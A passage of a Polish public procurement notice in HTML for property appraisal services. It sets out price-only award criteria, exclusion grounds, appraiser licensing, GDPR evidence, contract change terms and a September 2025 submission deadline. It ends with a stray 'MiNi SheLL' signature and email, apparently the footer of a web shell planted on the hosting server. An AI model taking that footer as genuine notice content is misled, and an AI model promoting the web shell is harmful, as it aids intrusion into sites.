class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Na podstawie kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. Zgodnie z art. 112 ust. 1 pkt 2 ustawy o udzielenie zamówienia w niniejszym postępowaniu mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu <br/>w następującym zakresie:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej:<br/> Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że <br/>a) dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamówienia – <br/>co najmniej jedną osobą posiadającą uprawnienia zawodowe w zakresie szacowania nieruchomości, nadane w trybie przepisów ustawy z dnia 21.08.1997 r. o gospodarce nieruchomościami.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy, jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje dostawy, do których realizacji te uprawnienia są wymagane (jeżeli dotyczy). <br/>5. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy<br/>w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Pzp., o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2023 r. poz. 1689 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej <br/>- Załącznik nr 3 do SWZ;<br/>2)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – Załącznik nr 4 do SWZ;<br/>2) oświadczenia na temat wykształcenia i kwalifikacji zawodowych Wykonawcy lub kadry kierowniczej wykonawcy – Załącznik nr 4 do SWZ;<br/>3) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 3-6 Pzp. - Załącznik nr 5</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) wykaz wdrożonych środków organizacyjnych i technicznych, gwarantujących przetwarzanie powierzonych danych zgodnie z wymogami RODO oraz umowy powierzenia przetwarzania danych osobowych– zgodnie z treścią Załącznika Nr<br/>10 do SWZ (Lista kontrola dla potencjalnych podmiotów przetwarzających) lub równoważne przedmiotowe środki dowodowe, jeśli potwierdzają, że wdrożone środki organizacyjne i techniczne gwarantują przetwarzanie powierzonych danych zgodnie z wymogami RODO oraz umowy powierzenia<br/>przetwarzania danych osobowych; <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1) Zamawiający żąda złożenia wraz z ofertą przedmiotowych środków dowodowych – na potwierdzenie zgodności<br/>oferowanych usług z wymaganiami związanymi z realizacją zamówienia tj.:<br/>wykazu wdrożonych środków organizacyjnych i technicznych, gwarantujących przetwarzanie powierzonych danych zgodnie<br/>z wymogami RODO oraz umowy powierzenia przetwarzania danych osobowych,– zgodnie z treścią Załącznika Nr 10 do<br/>SWZ (Lista kontrola dla potencjalnych podmiotów przetwarzających).<br/>2) Zamawiający akceptuje równoważne przedmiotowe środki dowodowe, jeśli potwierdzają, że wdrożone środki<br/>organizacyjne i techniczne gwarantują przetwarzanie powierzonych danych zgodnie z wymogami RODO oraz umowy<br/>powierzenia przetwarzania danych osobowych<br/>3) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych. Na podstawie art. 107 ust. 2 ustawy Pzp<br/>zamawiający przewiduje, że w sytuacji, w której Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone<br/>przedmiotowe środki dowodowe są niekompletne, zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym<br/>terminie. - Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>Podmiotowe i przedmiotowe środki dowodowe lub inne dokumenty, w tym dokumenty potwierdzające umocowanie do<br/>reprezentowania, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1 do SWZ.<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ – załącznik nr 2 do SWZ;<br/>2)	zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy) – załącznik nr 6 do SWZ;<br/>3)	Oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postepowaniu – (jeżeli dotyczy) załącznik nr 7 do SWZ.<br/>4)	oświadczenie o którym mowa w art. 117 ust. 4 ustawy Pzp - dotyczy wykonawców wspólnie ubiegających się o zamówienie, zgodnie ze wzorem stanowiącym załącznik nr 8 SWZ <br/>(jeżeli dotyczy),<br/>5) wykaz wdrożonych środków organizacyjnych i technicznych, gwarantujących przetwarzanie powierzonych danych zgodnie z wymogami RODO oraz umowy powierzenia przetwarzania danych osobowych– zgodnie z treścią Załącznika Nr 10 do SWZ (Lista kontrola dla potencjalnych podmiotów przetwarzających) lub równoważne przedmiotowe środki dowodowe, jeśli potwierdzają, że wdrożone środki organizacyjne<br/>i techniczne gwarantują przetwarzanie powierzonych danych zgodnie z wymogami RODO oraz umowy powierzenia przetwarzania danych osobowych;<br/>6)	dokumenty, z których wynika prawo do podpisania oferty; <br/>7) odpowiednie pełnomocnictwa, o ile ofertę składa pełnomocnik <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (art. 58 ustawy).<br/>W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi/roboty budowlane/dostawy (w zależności od tego co jest rodzajem zamówienia) wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia<br/>z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>6. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia kluczowych zadań dotyczących:<br/>1) zamówień na roboty budowlane lub usługi;<br/>2) prac związanych z rozmieszczeniem i instalacją, w ramach zamówienia na dostawy, zgodnie z art. 60 ustawy Pzp.<br/>Szczegółowe informacje określa SWZ.(jeżeli dotyczy) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wprowadzenie zmian treści umowy wymaga formy pisemnej pod rygorem nieważności. <br/>Potrzeba wprowadzenia zmian może wynikać z następujących okoliczności:<br/>1)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy.<br/>2)	zmiany warunków płatności, zmiany numeru konta bankowego Wykonawcy.<br/>3)	w sytuacji wyrażenia przez Zamawiającego zgody na przedłużenie terminu wykonania zamówienia na skutek zaistnienia okoliczności niezawinionych przez Wykonawcę, jednak nie dłużej niż dwa tygodnie.<br/>4)	zmiany ustawowej stawki podatku Vat.<br/>5)	zmniejszenie zakresu rzeczowego zadania, jednak nie więcej niż o 30% i w związku <br/>z tym zmianę wynagrodzenia.<br/>6)	innych, których nie można było przewidzieć w chwili zawarcia umowy.<br/>2.	Zmiany treści umowy dopuszczone w ust. 1 nie mogą prowadzić do zwiększenia wynagrodzenia, z zastrzeżeniem dopuszczalności zmiany wysokości wynagrodzenia wynikającej ze zmiany ustawowej stawki podatku Vat. (Dla zadania 1 i 2) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-25 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez Platformę https://platformazakupowa.pl/pn/staszowski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-25 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com